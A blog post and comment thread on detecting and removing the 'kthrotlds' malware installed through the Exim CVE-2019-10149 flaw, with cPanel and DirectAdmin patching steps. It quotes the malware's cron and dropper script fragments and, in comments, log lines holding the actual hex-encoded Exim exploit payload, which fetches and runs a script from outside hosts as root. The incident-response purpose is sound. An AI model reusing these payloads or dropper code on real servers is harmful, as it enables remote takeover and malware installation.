If you found some strange name process like [kthrotlds] running on your server, it
means your server could be affected by CVE-2019-10149 Exim security exploit. Of course process name can be different, first of all you need to kill it:
pkill -9 -f kthrotlds
ps aux | grep kthrotlds # To check if process still exists
Its binnary file created in /usr/bin/ directory:
/usr/bin/[kthrotlds]
ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
You need quarantine it or just remove.
You can find TCP connection on this process, so its not kernel procesas like it would like to pretend in your process list.
While fixing this issue my advice is to stop crond service: service crond stop
Than you should find all files which could be affected:
grep -r passwd /var/spool/cron*
*/11 * * * * root tbin=$(command -v passwd); bpath=$(dirname “${tbin}”); curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi; wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “to
You need to check /etc, /root, /usr/local/bin for bash/sh scripts with malware code, like:
#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
RHOST=”https://an7kmd2wp4xo7hpr”
TOR1=”.tor2web.su/”
TOR2=”.tor2web.io/”
TOR3=”.onion.sh/”
RPATH1=’src/ldm’
#LPATH=”${HOME-/tmp}/.cache/”
TIMEOUT=”75″
CTIMEOUT=”22″
COPTS=” -fsSLk –retry 2 –connect-timeout ${CTIMEOUT} –max-time ${TIMEOUT} ”
WOPTS=” –quiet –tries=2 –wait=5 –no-check-certificate –connect-timeout=${CTIMEOUT} –timeout=${TIMEOUT} ”
tbin=$(command -v passwd); bpath=$(dirname “${tbin}”)
curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi
wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “.wgetrc’-style command” && wget=”$f” && break; done; fi; fi
#CHKCURL=’curl=”curl “; wget=”wget “; if [ “$(whoami)” = “root” ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl=”echo “; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget=”echo “; fi; if [ $(cat /etc/hosts|grep -i “.onion.”|wc -l) -ne 0 ]; then echo “127.0.0.1 localhost” > /etc/hosts >/dev/null 2>&1; fi; fi; ‘
CHKCURL=’tbin=$(command -v passwd); bpath=$(dirname “${tbin}”); curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi; wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “to
LBIN8=”kthrotlds”
null=’ >/dev/null 2>&1′
If its cPanel server, you need to check Exim version like this:
whmapi1 installed_versions packages=1|grep exim
exim: 4.91-4
– exim-4.91-4.cp1170.x86_64
or simple exim –version
Exim version 4.91 #1 built 06-Jun-2019 12:52:02
To patch WHM and Exsim, if you have older versions like v76 or v70. To check your WHM version:
whmapi1 installed_versions packages=1|grep whm
cpanel_and_whm: 11.78.0.27
It means 78.0.27
or
cpanel_and_whm: 11.80.0.14
It means 80.0.14
vi /etc/cpupdate.conf
CPANEL=11.76
RPMUP=daily
SARULESUP=daily
STAGING_DIR=/usr/local/cpanel
UPDATES=daily
Than:
/scripts/upcp
Than back:
vi /etc/cpupdate.conf
CPANEL=release
RPMUP=daily
SARULESUP=daily
STAGING_DIR=/usr/local/cpanel
UPDATES=daily
P.s. Also you need to check /root/.ssh/authorized_keys, /etc/cron.d, /etc/cron.daily, /etc/cron.weekly, /etc/cron.monthly and etc.
You can all modified file during last 5 days:
find /etc/ -mtime -5 -print
This malware script removes all your previous cron tasks, so you need to restore them from your backups and than enable cron service again.
We have infected how could we remove this ?
I have stopped cron service ;
but these files not possible to remove /root/.ssh/authrozied_key
/var/spool/cron/root file
Thanks
/root/.ssh/authorized_keys is for passwordless SSH connection for the root user to access your server. So if you do not use private key to access your server, you need to empty this file like this:
> /root/.ssh/authorized_keys
if you are getting error about permissions issue, you need try: chattr -R -i /root and than > /root/.ssh/authorized_keys
same with /var/spool/cron/root, just try:
> /var/spool/cron/root
How to clean this up?.
https://www.kb.penguinbliss.com/?p=643
The following script cleans the relevant files, it worked for us (after updating cpanel):
https://github.com/bananaphones/exim-rce-quickfix
Maybe it’s fine if you have standalone exim server, but it’s not ok if you have cPanel or directadmin. cPanel use its own exim RPM version:
yum list installed | grep exim
exim.x86_64 4.92-1.cp1180 installed
before running some scripts from github.com make sure you have backups of current configuration. especially /etc files.
directadmin use source code, so you can update exim like this:
/usr/local/directadmin/custombuild
./build update
vi options.conf
#Mail Settings
exim=yes
eximconf=yes
Than run:
./build exim
./build exim_conf
I removed the first portion of the script, so it only removed the necessary crap. Forgot to mention that.
Thank you for your information, I was found it on my machine and already removed by following your instructions.
Please allow me to share this tutorial on my blog.
Of course you can share it. I’m glad I was able to help.
I got hit with this just over an hour before I applied the Debian patch. The first file modified was /etc/ssh/sshd_config. At around the same time the following was in the exim4 mainlog (fqdn redacted):
2019-06-12 05:13:36 1hb0G8-0004Qa-MK <= H=(my.domain.name) [89.248.171.57] P=smtp S=824
2019-06-12 05:13:37 1hb0G8-0004Qa-MK ** ${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e10\x2e68\x2e193\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2ejfmfrjdo\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ejfmfrjdo\x20\x2dn\x20\x26\x22}}@my.domain.name: Too many “Received” headers – suspected mail loop
Everyone can find if attack still exist and find attacker IP address like this:
cat /var/log/exim_mainlog | grep wget
2019-06-13 19:11:02 1hbSJa-00BO3f-5u <= <> H=(xxx.xxxxxx.xxx) [89.248.171.57]:60454 P=smtp S=852 for root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ecboiq\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ecboiq\x20\x2dn\x20\x26\x22}}@xxx.xxxxx.xxx
2019-06-13 19:11:02 cwd=/var/spool/exim 3 args: /usr/sbin/exim -Mc 1hbSJa-00BO3f-5u
2019-06-13 19:11:02 1hbSJa-00BO3f-5u ** root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ecboiq\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ecboiq\x20\x2dn\x20\x26\x22}}@xxx.cloxxxxxudlix.xxx: Too many “Received” headers – suspected mail loop
This is Remote Command Execution exploit , it allows a local user to run commands as root due to an issue in the deliver message code
Pingback: Ataque masivo a instalaciones de Exim — Una al Día
Hi. Thanks so much for all your help here! I have cPanel and am not finding a way to update Exim. I do a server software update in WHM, but the version remains 4.91 not 4.92. (exim-4.91-5.cp1178.x86_64).
I’ve tried other recommendations for updating in SSH, but the version remains 4.91.
You described how to update Exim with directadmin. Could you do the same for cPanel? I’d greatly appreciate it!
You can check exim version like this:
exim --versionExim version 4.91 #1 built 06-Jun-2019 12:52:02
as you can see built 06-Jun-2019 and its fine, because its patched version
also you can check like this:
whmapi1 installed_versions packages=1|grep eximexim: 4.91-4
- exim-4.91-4.cp1170.x86_64
Thanks, Vitalijus.
exim –version
returns:
Exim version 4.91 #1 built 07-Mar-2019 22:58:08
It’s not the patched (June) version. And nothing I’ve tried so far seems to be able to get it upgraded to the June version. . . that’s why I was asking if you knew a direct way to do that upgrade Exim (apart from WHM/CPanel). Thanks!
P.S. Would the Exim upgrade automatically happen if I successfully upgraded WHM/CPanel? I’m currently have version v78.0.23. I understand that the 78.0.27 version is patched, so I’ve been trying to use the WHM “Upgrade” function to upgrade to 78.0.30 — but the upgrade keeps stopping at 17% through. . . . Thanks.
Use script here: https://github.com/bananaphones/exim-rce-quickfix/blob/master/exim_rce_fixer.sh but remove lines 3 through 31. After it is executed the server reboot and you should be able to run WHM upgrade. I have used this on two infected servers and it removed the malware.
Hi,
I have 2many issues with my VPS. How can this be fixed? Please help.
1. My cPanel expired and I do not want to renew it.
2. I have one problem. I am seeing a process that is taking up the whole CPU processing power. Process name: “kthrotlds”.
3. ssh not working.
4. The server can be accessed thru Webmin control panel and commands can be run there.
Basically I have 2 control panels, cpanel which is expired and webmin.